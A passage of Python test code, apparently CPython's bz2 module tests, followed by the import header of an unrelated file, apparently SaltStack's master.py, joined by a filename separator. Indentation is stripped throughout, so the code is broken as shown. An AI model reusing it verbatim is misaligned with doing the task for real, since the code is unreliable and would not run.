b'www:x:103:104::/var/www:/bin/false\n',
]
TEXT = b''.join(TEXT_LINES)
DATA = b'BZh91AY&SY.\xc8N\x18\x00\x01>_\x80\x00\x10@\x02\xff\xf0\x01\x07n\x00?\xe7\xff\xe00\x01\x99\xaa\x00\xc0\x03F\x86\x8c#&\x83F\x9a\x03\x06\xa6\xd0\xa6\x93M\x0fQ\xa7\xa8\x06\x804hh\x12$\x11\xa4i4\xf14S\xd2<Q\xb5\x0fH\xd3\xd4\xdd\xd5\x87\xbb\xf8\x94\r\x8f\xafI\x12\xe1\xc9\xf8/E\x00pu\x89\x12]\xc9\xbbDL\nQ\x0e\t1\x12\xdf\xa0\xc0\x97\xac2O9\x89\x13\x94\x0e\x1c7\x0ed\x95I\x0c\xaaJ\xa4\x18L\x10\x05#\x9c\xaf\xba\xbc/\x97\x8a#C\xc8\xe1\x8cW\xf9\xe2\xd0\xd6M\xa7\x8bXa<e\x84t\xcbL\xb3\xa7\xd9\xcd\xd1\xcb\x84.\xaf\xb3\xab\xab\xad`n}\xa0lh\tE,\x8eZ\x15\x17VH>\x88\xe5\xcd9gd6\x0b\n\xe9\x9b\xd5\x8a\x99\xf7\x08.K\x8ev\xfb\xf7xw\xbb\xdf\xa1\x92\xf1\xdd|/";\xa2\xba\x9f\xd5\xb1#A\xb6\xf6\xb3o\xc9\xc5y\\\xebO\xe7\x85\x9a\xbc\xb6f8\x952\xd5\xd7"%\x89>V,\xf7\xa6z\xe2\x9f\xa3\xdf\x11\x11"\xd6E)I\xa9\x13^\xca\xf3r\xd0\x03U\x922\xf26\xec\xb6\xed\x8b\xc3U\x13\x9d\xc5\x170\xa4\xfa^\x92\xacDF\x8a\x97\xd6\x19\xfe\xdd\xb8\xbd\x1a\x9a\x19\xa3\x80ankR\x8b\xe5\xd83]\xa9\xc6\x08\x82f\xf6\xb9"6l$\xb8j@\xc0\x8a\xb0l1..\xbak\x83ls\x15\xbc\xf4\xc1\x13\xbe\xf8E\xb8\x9d\r\xa8\x9dk\x84\xd3n\xfa\xacQ\x07\xb1%y\xaav\xb4\x08\xe0z\x1b\x16\xf5\x04\xe9\xcc\xb9\x08z\x1en7.G\xfc]\xc9\x14\xe1B@\xbb!8`'
EMPTY_DATA = b'BZh9\x17rE8P\x90\x00\x00\x00\x00'
BAD_DATA = b'this is not a valid bzip2 file'
# Some tests need more than one block of uncompressed data. Since one block
# is at least 100,000 bytes, we gather some data dynamically and compress it.
# Note that this assumes that compression works correctly, so we cannot
# simply use the bigger test data for all tests.
test_size = 0
BIG_TEXT = bytearray(128*1024)
for fname in glob.glob(os.path.join(glob.escape(os.path.dirname(__file__)), '*.py')):
with open(fname, 'rb') as fh:
test_size += fh.readinto(memoryview(BIG_TEXT)[test_size:])
if test_size > 128*1024:
break
BIG_DATA = bz2.compress(BIG_TEXT, compresslevel=1)
def setUp(self):
fd, self.filename = tempfile.mkstemp()
os.close(fd)
def tearDown(self):
unlink(self.filename)
class BZ2FileTest(BaseTest):
"Test the BZ2File class."
def createTempFile(self, streams=1, suffix=b""):
with open(self.filename, "wb") as f:
f.write(self.DATA * streams)
f.write(suffix)
def testBadArgs(self):
self.assertRaises(TypeError, BZ2File, 123.456)
self.assertRaises(ValueError, BZ2File, os.devnull, "z")
self.assertRaises(ValueError, BZ2File, os.devnull, "rx")
self.assertRaises(ValueError, BZ2File, os.devnull, "rbt")
self.assertRaises(ValueError, BZ2File, os.devnull, compresslevel=0)
self.assertRaises(ValueError, BZ2File, os.devnull, compresslevel=10)
# compresslevel is keyword-only
self.assertRaises(TypeError, BZ2File, os.devnull, "r", 3)
def testRead(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(), self.TEXT)
def testReadBadFile(self):
self.createTempFile(streams=0, suffix=self.BAD_DATA)
with BZ2File(self.filename) as bz2f:
self.assertRaises(OSError, bz2f.read)
def testReadMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(), self.TEXT * 5)
def testReadMonkeyMultiStream(self):
# Test BZ2File.read() on a multi-stream archive where a stream
# boundary coincides with the end of the raw read buffer.
buffer_size = _compression.BUFFER_SIZE
_compression.BUFFER_SIZE = len(self.DATA)
try:
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(), self.TEXT * 5)
finally:
_compression.BUFFER_SIZE = buffer_size
def testReadTrailingJunk(self):
self.createTempFile(suffix=self.BAD_DATA)
with BZ2File(self.filename) as bz2f:
self.assertEqual(bz2f.read(), self.TEXT)
def testReadMultiStreamTrailingJunk(self):
self.createTempFile(streams=5, suffix=self.BAD_DATA)
with BZ2File(self.filename) as bz2f:
self.assertEqual(bz2f.read(), self.TEXT * 5)
def testRead0(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(0), b"")
def testReadChunk10(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
text = b''
while True:
str = bz2f.read(10)
if not str:
break
text += str
self.assertEqual(text, self.TEXT)
def testReadChunk10MultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
text = b''
while True:
str = bz2f.read(10)
if not str:
break
text += str
self.assertEqual(text, self.TEXT * 5)
def testRead100(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertEqual(bz2f.read(100), self.TEXT[:100])
def testPeek(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
pdata = bz2f.peek()
self.assertNotEqual(len(pdata), 0)
self.assertTrue(self.TEXT.startswith(pdata))
self.assertEqual(bz2f.read(), self.TEXT)
def testReadInto(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
n = 128
b = bytearray(n)
self.assertEqual(bz2f.readinto(b), n)
self.assertEqual(b, self.TEXT[:n])
n = len(self.TEXT) - n
b = bytearray(len(self.TEXT))
self.assertEqual(bz2f.readinto(b), n)
self.assertEqual(b[:n], self.TEXT[-n:])
def testReadLine(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.readline, None)
for line in self.TEXT_LINES:
self.assertEqual(bz2f.readline(), line)
def testReadLineMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.readline, None)
for line in self.TEXT_LINES * 5:
self.assertEqual(bz2f.readline(), line)
def testReadLines(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.readlines, None)
self.assertEqual(bz2f.readlines(), self.TEXT_LINES)
def testReadLinesMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.readlines, None)
self.assertEqual(bz2f.readlines(), self.TEXT_LINES * 5)
def testIterator(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertEqual(list(iter(bz2f)), self.TEXT_LINES)
def testIteratorMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertEqual(list(iter(bz2f)), self.TEXT_LINES * 5)
def testClosedIteratorDeadlock(self):
# Issue #3309: Iteration on a closed BZ2File should release the lock.
self.createTempFile()
bz2f = BZ2File(self.filename)
bz2f.close()
self.assertRaises(ValueError, next, bz2f)
# This call will deadlock if the above call failed to release the lock.
self.assertRaises(ValueError, bz2f.readlines)
def testWrite(self):
with BZ2File(self.filename, "w") as bz2f:
self.assertRaises(TypeError, bz2f.write)
bz2f.write(self.TEXT)
with open(self.filename, 'rb') as f:
self.assertEqual(ext_decompress(f.read()), self.TEXT)
def testWriteChunks10(self):
with BZ2File(self.filename, "w") as bz2f:
n = 0
while True:
str = self.TEXT[n*10:(n+1)*10]
if not str:
break
bz2f.write(str)
n += 1
with open(self.filename, 'rb') as f:
self.assertEqual(ext_decompress(f.read()), self.TEXT)
def testWriteNonDefaultCompressLevel(self):
expected = bz2.compress(self.TEXT, compresslevel=5)
with BZ2File(self.filename, "w", compresslevel=5) as bz2f:
bz2f.write(self.TEXT)
with open(self.filename, "rb") as f:
self.assertEqual(f.read(), expected)
def testWriteLines(self):
with BZ2File(self.filename, "w") as bz2f:
self.assertRaises(TypeError, bz2f.writelines)
bz2f.writelines(self.TEXT_LINES)
# Issue #1535500: Calling writelines() on a closed BZ2File
# should raise an exception.
self.assertRaises(ValueError, bz2f.writelines, ["a"])
with open(self.filename, 'rb') as f:
self.assertEqual(ext_decompress(f.read()), self.TEXT)
def testWriteMethodsOnReadOnlyFile(self):
with BZ2File(self.filename, "w") as bz2f:
bz2f.write(b"abc")
with BZ2File(self.filename, "r") as bz2f:
self.assertRaises(OSError, bz2f.write, b"a")
self.assertRaises(OSError, bz2f.writelines, [b"a"])
def testAppend(self):
with BZ2File(self.filename, "w") as bz2f:
self.assertRaises(TypeError, bz2f.write)
bz2f.write(self.TEXT)
with BZ2File(self.filename, "a") as bz2f:
self.assertRaises(TypeError, bz2f.write)
bz2f.write(self.TEXT)
with open(self.filename, 'rb') as f:
self.assertEqual(ext_decompress(f.read()), self.TEXT * 2)
def testSeekForward(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.seek)
bz2f.seek(150)
self.assertEqual(bz2f.read(), self.TEXT[150:])
def testSeekForwardAcrossStreams(self):
self.createTempFile(streams=2)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.seek)
bz2f.seek(len(self.TEXT) + 150)
self.assertEqual(bz2f.read(), self.TEXT[150:])
def testSeekBackwards(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.read(500)
bz2f.seek(-150, 1)
self.assertEqual(bz2f.read(), self.TEXT[500-150:])
def testSeekBackwardsAcrossStreams(self):
self.createTempFile(streams=2)
with BZ2File(self.filename) as bz2f:
readto = len(self.TEXT) + 100
while readto > 0:
readto -= len(bz2f.read(readto))
bz2f.seek(-150, 1)
self.assertEqual(bz2f.read(), self.TEXT[100-150:] + self.TEXT)
def testSeekBackwardsFromEnd(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(-150, 2)
self.assertEqual(bz2f.read(), self.TEXT[len(self.TEXT)-150:])
def testSeekBackwardsFromEndAcrossStreams(self):
self.createTempFile(streams=2)
with BZ2File(self.filename) as bz2f:
bz2f.seek(-1000, 2)
self.assertEqual(bz2f.read(), (self.TEXT * 2)[-1000:])
def testSeekPostEnd(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT))
self.assertEqual(bz2f.read(), b"")
def testSeekPostEndMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT) * 5)
self.assertEqual(bz2f.read(), b"")
def testSeekPostEndTwice(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(150000)
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT))
self.assertEqual(bz2f.read(), b"")
def testSeekPostEndTwiceMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
bz2f.seek(150000)
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT) * 5)
self.assertEqual(bz2f.read(), b"")
def testSeekPreStart(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(-150)
self.assertEqual(bz2f.tell(), 0)
self.assertEqual(bz2f.read(), self.TEXT)
def testSeekPreStartMultiStream(self):
self.createTempFile(streams=2)
with BZ2File(self.filename) as bz2f:
bz2f.seek(-150)
self.assertEqual(bz2f.tell(), 0)
self.assertEqual(bz2f.read(), self.TEXT * 2)
def testFileno(self):
self.createTempFile()
with open(self.filename, 'rb') as rawf:
bz2f = BZ2File(rawf)
try:
self.assertEqual(bz2f.fileno(), rawf.fileno())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.fileno)
def testSeekable(self):
bz2f = BZ2File(BytesIO(self.DATA))
try:
self.assertTrue(bz2f.seekable())
bz2f.read()
self.assertTrue(bz2f.seekable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.seekable)
bz2f = BZ2File(BytesIO(), "w")
try:
self.assertFalse(bz2f.seekable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.seekable)
src = BytesIO(self.DATA)
src.seekable = lambda: False
bz2f = BZ2File(src)
try:
self.assertFalse(bz2f.seekable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.seekable)
def testReadable(self):
bz2f = BZ2File(BytesIO(self.DATA))
try:
self.assertTrue(bz2f.readable())
bz2f.read()
self.assertTrue(bz2f.readable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.readable)
bz2f = BZ2File(BytesIO(), "w")
try:
self.assertFalse(bz2f.readable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.readable)
def testWritable(self):
bz2f = BZ2File(BytesIO(self.DATA))
try:
self.assertFalse(bz2f.writable())
bz2f.read()
self.assertFalse(bz2f.writable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.writable)
bz2f = BZ2File(BytesIO(), "w")
try:
self.assertTrue(bz2f.writable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.writable)
def testOpenDel(self):
self.createTempFile()
for i in range(10000):
o = BZ2File(self.filename)
del o
def testOpenNonexistent(self):
self.assertRaises(OSError, BZ2File, "/non/existent")
def testReadlinesNoNewline(self):
# Issue #1191043: readlines() fails on a file containing no newline.
data = b'BZh91AY&SY\xd9b\x89]\x00\x00\x00\x03\x80\x04\x00\x02\x00\x0c\x00 \x00!\x9ah3M\x13<]\xc9\x14\xe1BCe\x8a%t'
with open(self.filename, "wb") as f:
f.write(data)
with BZ2File(self.filename) as bz2f:
lines = bz2f.readlines()
self.assertEqual(lines, [b'Test'])
with BZ2File(self.filename) as bz2f:
xlines = list(bz2f.readlines())
self.assertEqual(xlines, [b'Test'])
def testContextProtocol(self):
f = None
with BZ2File(self.filename, "wb") as f:
f.write(b"xxx")
f = BZ2File(self.filename, "rb")
f.close()
try:
with f:
pass
except ValueError:
pass
else:
self.fail("__enter__ on a closed file didn't raise an exception")
try:
with BZ2File(self.filename, "wb") as f:
1/0
except ZeroDivisionError:
pass
else:
self.fail("1/0 didn't raise an exception")
def testThreading(self):
# Issue #7205: Using a BZ2File from several threads shouldn't deadlock.
data = b"1" * 2**20
nthreads = 10
with BZ2File(self.filename, 'wb') as f:
def comp():
for i in range(5):
f.write(data)
threads = [threading.Thread(target=comp) for i in range(nthreads)]
with threading_helper.start_threads(threads):
pass
def testMixedIterationAndReads(self):
self.createTempFile()
linelen = len(self.TEXT_LINES[0])
halflen = linelen // 2
with BZ2File(self.filename) as bz2f:
bz2f.read(halflen)
self.assertEqual(next(bz2f), self.TEXT_LINES[0][halflen:])
self.assertEqual(bz2f.read(), self.TEXT[linelen:])
with BZ2File(self.filename) as bz2f:
bz2f.readline()
self.assertEqual(next(bz2f), self.TEXT_LINES[1])
self.assertEqual(bz2f.readline(), self.TEXT_LINES[2])
with BZ2File(self.filename) as bz2f:
bz2f.readlines()
self.assertRaises(StopIteration, next, bz2f)
self.assertEqual(bz2f.readlines(), [])
def testMultiStreamOrdering(self):
# Test the ordering of streams when reading a multi-stream archive.
data1 = b"foo" * 1000
data2 = b"bar" * 1000
with BZ2File(self.filename, "w") as bz2f:
bz2f.write(data1)
with BZ2File(self.filename, "a") as bz2f:
bz2f.write(data2)
with BZ2File(self.filename) as bz2f:
self.assertEqual(bz2f.read(), data1 + data2)
def testOpenBytesFilename(self):
str_filename = self.filename
try:
bytes_filename = str_filename.encode("ascii")
except UnicodeEncodeError:
self.skipTest("Temporary file name needs to be ASCII")
with BZ2File(bytes_filename, "wb") as f:
f.write(self.DATA)
with BZ2File(bytes_filename, "rb") as f:
self.assertEqual(f.read(), self.DATA)
# Sanity check that we are actually operating on the right file.
with BZ2File(str_filename, "rb") as f:
self.assertEqual(f.read(), self.DATA)
def testOpenPathLikeFilename(self):
filename = pathlib.Path(self.filename)
with BZ2File(filename, "wb") as f:
f.write(self.DATA)
with BZ2File(filename, "rb") as f:
self.assertEqual(f.read(), self.DATA)
def testDecompressLimited(self):
"""Decompressed data buffering should be limited"""
bomb = bz2.compress(b'\0' * int(2e6), compresslevel=9)
self.assertLess(len(bomb), _compression.BUFFER_SIZE)
decomp = BZ2File(BytesIO(bomb))
self.assertEqual(decomp.read(1), b'\0')
max_decomp = 1 + DEFAULT_BUFFER_SIZE
self.assertLessEqual(decomp._buffer.raw.tell(), max_decomp,
"Excessive amount of data was decompressed")
# Tests for a BZ2File wrapping another file object:
def testReadBytesIO(self):
with BytesIO(self.DATA) as bio:
with BZ2File(bio) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(), self.TEXT)
self.assertFalse(bio.closed)
def testPeekBytesIO(self):
with BytesIO(self.DATA) as bio:
with BZ2File(bio) as bz2f:
pdata = bz2f.peek()
self.assertNotEqual(len(pdata), 0)
self.assertTrue(self.TEXT.startswith(pdata))
self.assertEqual(bz2f.read(), self.TEXT)
def testWriteBytesIO(self):
with BytesIO() as bio:
with BZ2File(bio, "w") as bz2f:
self.assertRaises(TypeError, bz2f.write)
bz2f.write(self.TEXT)
self.assertEqual(ext_decompress(bio.getvalue()), self.TEXT)
self.assertFalse(bio.closed)
def testSeekForwardBytesIO(self):
with BytesIO(self.DATA) as bio:
with BZ2File(bio) as bz2f:
self.assertRaises(TypeError, bz2f.seek)
bz2f.seek(150)
self.assertEqual(bz2f.read(), self.TEXT[150:])
def testSeekBackwardsBytesIO(self):
with BytesIO(self.DATA) as bio:
with BZ2File(bio) as bz2f:
bz2f.read(500)
bz2f.seek(-150, 1)
self.assertEqual(bz2f.read(), self.TEXT[500-150:])
def test_read_truncated(self):
# Drop the eos_magic field (6 bytes) and CRC (4 bytes).
truncated = self.DATA[:-10]
with BZ2File(BytesIO(truncated)) as f:
self.assertRaises(EOFError, f.read)
with BZ2File(BytesIO(truncated)) as f:
self.assertEqual(f.read(len(self.TEXT)), self.TEXT)
self.assertRaises(EOFError, f.read, 1)
# Incomplete 4-byte file header, and block header of at least 146 bits.
for i in range(22):
with BZ2File(BytesIO(truncated[:i])) as f:
self.assertRaises(EOFError, f.read, 1)
class BZ2CompressorTest(BaseTest):
def testCompress(self):
bz2c = BZ2Compressor()
self.assertRaises(TypeError, bz2c.compress)
data = bz2c.compress(self.TEXT)
data += bz2c.flush()
self.assertEqual(ext_decompress(data), self.TEXT)
def testCompressEmptyString(self):
bz2c = BZ2Compressor()
data = bz2c.compress(b'')
data += bz2c.flush()
self.assertEqual(data, self.EMPTY_DATA)
def testCompressChunks10(self):
bz2c = BZ2Compressor()
n = 0
data = b''
while True:
str = self.TEXT[n*10:(n+1)*10]
if not str:
break
data += bz2c.compress(str)
n += 1
data += bz2c.flush()
self.assertEqual(ext_decompress(data), self.TEXT)
@support.skip_if_pgo_task
@bigmemtest(size=_4G + 100, memuse=2)
def testCompress4G(self, size):
# "Test BZ2Compressor.compress()/flush() with >4GiB input"
bz2c = BZ2Compressor()
data = b"x" * size
try:
compressed = bz2c.compress(data)
compressed += bz2c.flush()
finally:
data = None # Release memory
data = bz2.decompress(compressed)
try:
self.assertEqual(len(data), size)
self.assertEqual(len(data.strip(b"x")), 0)
finally:
data = None
def testPickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises(TypeError):
pickle.dumps(BZ2Compressor(), proto)
class BZ2DecompressorTest(BaseTest):
def test_Constructor(self):
self.assertRaises(TypeError, BZ2Decompressor, 42)
def testDecompress(self):
bz2d = BZ2Decompressor()
self.assertRaises(TypeError, bz2d.decompress)
text = bz2d.decompress(self.DATA)
self.assertEqual(text, self.TEXT)
def testDecompressChunks10(self):
bz2d = BZ2Decompressor()
text = b''
n = 0
while True:
str = self.DATA[n*10:(n+1)*10]
if not str:
break
text += bz2d.decompress(str)
n += 1
self.assertEqual(text, self.TEXT)
def testDecompressUnusedData(self):
bz2d = BZ2Decompressor()
unused_data = b"this is unused data"
text = bz2d.decompress(self.DATA+unused_data)
self.assertEqual(text, self.TEXT)
self.assertEqual(bz2d.unused_data, unused_data)
def testEOFError(self):
bz2d = BZ2Decompressor()
text = bz2d.decompress(self.DATA)
self.assertRaises(EOFError, bz2d.decompress, b"anything")
self.assertRaises(EOFError, bz2d.decompress, b"")
@support.skip_if_pgo_task
@bigmemtest(size=_4G + 100, memuse=3.3)
def testDecompress4G(self, size):
# "Test BZ2Decompressor.decompress() with >4GiB input"
blocksize = 10 * 1024 * 1024
block = random.randbytes(blocksize)
try:
data = block * (size // blocksize + 1)
compressed = bz2.compress(data)
bz2d = BZ2Decompressor()
decompressed = bz2d.decompress(compressed)
self.assertTrue(decompressed == data)
finally:
data = None
compressed = None
decompressed = None
def testPickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises(TypeError):
pickle.dumps(BZ2Decompressor(), proto)
def testDecompressorChunksMaxsize(self):
bzd = BZ2Decompressor()
max_length = 100
out = []
# Feed some input
len_ = len(self.BIG_DATA) - 64
out.append(bzd.decompress(self.BIG_DATA[:len_],
max_length=max_length))
self.assertFalse(bzd.needs_input)
self.assertEqual(len(out[-1]), max_length)
# Retrieve more data without providing more input
out.append(bzd.decompress(b'', max_length=max_length))
self.assertFalse(bzd.needs_input)
self.assertEqual(len(out[-1]), max_length)
# Retrieve more data while providing more input
out.append(bzd.decompress(self.BIG_DATA[len_:],
max_length=max_length))
self.assertLessEqual(len(out[-1]), max_length)
# Retrieve remaining uncompressed data
while not bzd.eof:
out.append(bzd.decompress(b'', max_length=max_length))
self.assertLessEqual(len(out[-1]), max_length)
out = b"".join(out)
self.assertEqual(out, self.BIG_TEXT)
self.assertEqual(bzd.unused_data, b"")
def test_decompressor_inputbuf_1(self):
# Test reusing input buffer after moving existing
# contents to beginning
bzd = BZ2Decompressor()
out = []
# Create input buffer and fill it
self.assertEqual(bzd.decompress(self.DATA[:100],
max_length=0), b'')
# Retrieve some results, freeing capacity at beginning
# of input buffer
out.append(bzd.decompress(b'', 2))
# Add more data that fits into input buffer after
# moving existing data to beginning
out.append(bzd.decompress(self.DATA[100:105], 15))
# Decompress rest of data
out.append(bzd.decompress(self.DATA[105:]))
self.assertEqual(b''.join(out), self.TEXT)
def test_decompressor_inputbuf_2(self):
# Test reusing input buffer by appending data at the
# end right away
bzd = BZ2Decompressor()
out = []
# Create input buffer and empty it
self.assertEqual(bzd.decompress(self.DATA[:200],
max_length=0), b'')
out.append(bzd.decompress(b''))
# Fill buffer with new data
out.append(bzd.decompress(self.DATA[200:280], 2))
# Append some more data, not enough to require resize
out.append(bzd.decompress(self.DATA[280:300], 2))
# Decompress rest of data
out.append(bzd.decompress(self.DATA[300:]))
self.assertEqual(b''.join(out), self.TEXT)
def test_decompressor_inputbuf_3(self):
# Test reusing input buffer after extending it
bzd = BZ2Decompressor()
out = []
# Create almost full input buffer
out.append(bzd.decompress(self.DATA[:200], 5))
# Add even more data to it, requiring resize
out.append(bzd.decompress(self.DATA[200:300], 5))
# Decompress rest of data
out.append(bzd.decompress(self.DATA[300:]))
self.assertEqual(b''.join(out), self.TEXT)
def test_failure(self):
bzd = BZ2Decompressor()
self.assertRaises(Exception, bzd.decompress, self.BAD_DATA * 30)
# Previously, a second call could crash due to internal inconsistency
self.assertRaises(Exception, bzd.decompress, self.BAD_DATA * 30)
@support.refcount_test
def test_refleaks_in___init__(self):
gettotalrefcount = support.get_attribute(sys, 'gettotalrefcount')
bzd = BZ2Decompressor()
refs_before = gettotalrefcount()
for i in range(100):
bzd.__init__()
self.assertAlmostEqual(gettotalrefcount() - refs_before, 0, delta=10)
class CompressDecompressTest(BaseTest):
def testCompress(self):
data = bz2.compress(self.TEXT)
self.assertEqual(ext_decompress(data), self.TEXT)
def testCompressEmptyString(self):
text = bz2.compress(b'')
self.assertEqual(text, self.EMPTY_DATA)
def testDecompress(self):
text = bz2.decompress(self.DATA)
self.assertEqual(text, self.TEXT)
def testDecompressEmpty(self):
text = bz2.decompress(b"")
self.assertEqual(text, b"")
def testDecompressToEmptyString(self):
text = bz2.decompress(self.EMPTY_DATA)
self.assertEqual(text, b'')
def testDecompressIncomplete(self):
self.assertRaises(ValueError, bz2.decompress, self.DATA[:-10])
def testDecompressBadData(self):
self.assertRaises(OSError, bz2.decompress, self.BAD_DATA)
def testDecompressMultiStream(self):
text = bz2.decompress(self.DATA * 5)
self.assertEqual(text, self.TEXT * 5)
def testDecompressTrailingJunk(self):
text = bz2.decompress(self.DATA + self.BAD_DATA)
self.assertEqual(text, self.TEXT)
def testDecompressMultiStreamTrailingJunk(self):
text = bz2.decompress(self.DATA * 5 + self.BAD_DATA)
self.assertEqual(text, self.TEXT * 5)
class OpenTest(BaseTest):
"Test the open function."
def open(self, *args, **kwargs):
return bz2.open(*args, **kwargs)
def test_binary_modes(self):
for mode in ("wb", "xb"):
if mode == "xb":
unlink(self.filename)
with self.open(self.filename, mode) as f:
f.write(self.TEXT)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read())
self.assertEqual(file_data, self.TEXT)
with self.open(self.filename, "rb") as f:
self.assertEqual(f.read(), self.TEXT)
with self.open(self.filename, "ab") as f:
f.write(self.TEXT)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read())
self.assertEqual(file_data, self.TEXT * 2)
def test_implicit_binary_modes(self):
# Test implicit binary modes (no "b" or "t" in mode string).
for mode in ("w", "x"):
if mode == "x":
unlink(self.filename)
with self.open(self.filename, mode) as f:
f.write(self.TEXT)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read())
self.assertEqual(file_data, self.TEXT)
with self.open(self.filename, "r") as f:
self.assertEqual(f.read(), self.TEXT)
with self.open(self.filename, "a") as f:
f.write(self.TEXT)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read())
self.assertEqual(file_data, self.TEXT * 2)
def test_text_modes(self):
text = self.TEXT.decode("ascii")
text_native_eol = text.replace("\n", os.linesep)
for mode in ("wt", "xt"):
if mode == "xt":
unlink(self.filename)
with self.open(self.filename, mode) as f:
f.write(text)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read()).decode("ascii")
self.assertEqual(file_data, text_native_eol)
with self.open(self.filename, "rt") as f:
self.assertEqual(f.read(), text)
with self.open(self.filename, "at") as f:
f.write(text)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read()).decode("ascii")
self.assertEqual(file_data, text_native_eol * 2)
def test_x_mode(self):
for mode in ("x", "xb", "xt"):
unlink(self.filename)
with self.open(self.filename, mode) as f:
pass
with self.assertRaises(FileExistsError):
with self.open(self.filename, mode) as f:
pass
def test_fileobj(self):
with self.open(BytesIO(self.DATA), "r") as f:
self.assertEqual(f.read(), self.TEXT)
with self.open(BytesIO(self.DATA), "rb") as f:
self.assertEqual(f.read(), self.TEXT)
text = self.TEXT.decode("ascii")
with self.open(BytesIO(self.DATA), "rt") as f:
self.assertEqual(f.read(), text)
def test_bad_params(self):
# Test invalid parameter combinations.
self.assertRaises(ValueError,
self.open, self.filename, "wbt")
self.assertRaises(ValueError,
self.open, self.filename, "xbt")
self.assertRaises(ValueError,
self.open, self.filename, "rb", encoding="utf-8")
self.assertRaises(ValueError,
self.open, self.filename, "rb", errors="ignore")
self.assertRaises(ValueError,
self.open, self.filename, "rb", newline="\n")
def test_encoding(self):
# Test non-default encoding.
text = self.TEXT.decode("ascii")
text_native_eol = text.replace("\n", os.linesep)
with self.open(self.filename, "wt", encoding="utf-16-le") as f:
f.write(text)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read()).decode("utf-16-le")
self.assertEqual(file_data, text_native_eol)
with self.open(self.filename, "rt", encoding="utf-16-le") as f:
self.assertEqual(f.read(), text)
def test_encoding_error_handler(self):
# Test with non-default encoding error handler.
with self.open(self.filename, "wb") as f:
f.write(b"foo\xffbar")
with self.open(self.filename, "rt", encoding="ascii", errors="ignore") \
as f:
self.assertEqual(f.read(), "foobar")
def test_newline(self):
# Test with explicit newline (universal newline mode disabled).
text = self.TEXT.decode("ascii")
with self.open(self.filename, "wt", newline="\n") as f:
f.write(text)
with self.open(self.filename, "rt", newline="\r") as f:
self.assertEqual(f.readlines(), [text])
def test_main():
support.run_unittest(
BZ2FileTest,
BZ2CompressorTest,
BZ2DecompressorTest,
CompressDecompressTest,
OpenTest,
)
support.reap_children()
if __name__ == '__main__':
test_main()
|
master.py
|
# -*- coding: utf-8 -*-
'''
This module contains all of the routines needed to set up a master server, this
involves preparing the three listeners and the workers needed by the master.
'''
# Import python libs
import os
import re
import time
import errno
import signal
import shutil
import logging
import hashlib
import resource
import multiprocessing
import sys
# Import third party libs
import zmq
from M2Crypto import RSA
# Import salt libs
import salt.crypt
import salt.utils
import salt.client
import salt.exitcodes
import salt.payload
import salt.pillar
import salt.state
import salt.runner
import salt.auth
import salt.wheel
import salt.minion
import salt.search
import salt.key
import salt.fileserver
import salt.daemons.masterapi
import salt.utils.atomicfile
import salt.utils.event
import salt.utils.verify
import salt.utils.minions
import salt.utils.gzip_util
from salt.utils.debug import enable_sigusr1_handler, enable_sigusr2_handler, inspect_stack
from salt.exceptions import MasterExit
from salt.utils.event import tagify
import binascii
# Import halite libs
try:
import halite
HAS_HALITE = True
except ImportError:
HAS_HALITE = False
try:
import systemd.daemon
HAS_PYTHON_SYSTEMD = True
except ImportError:
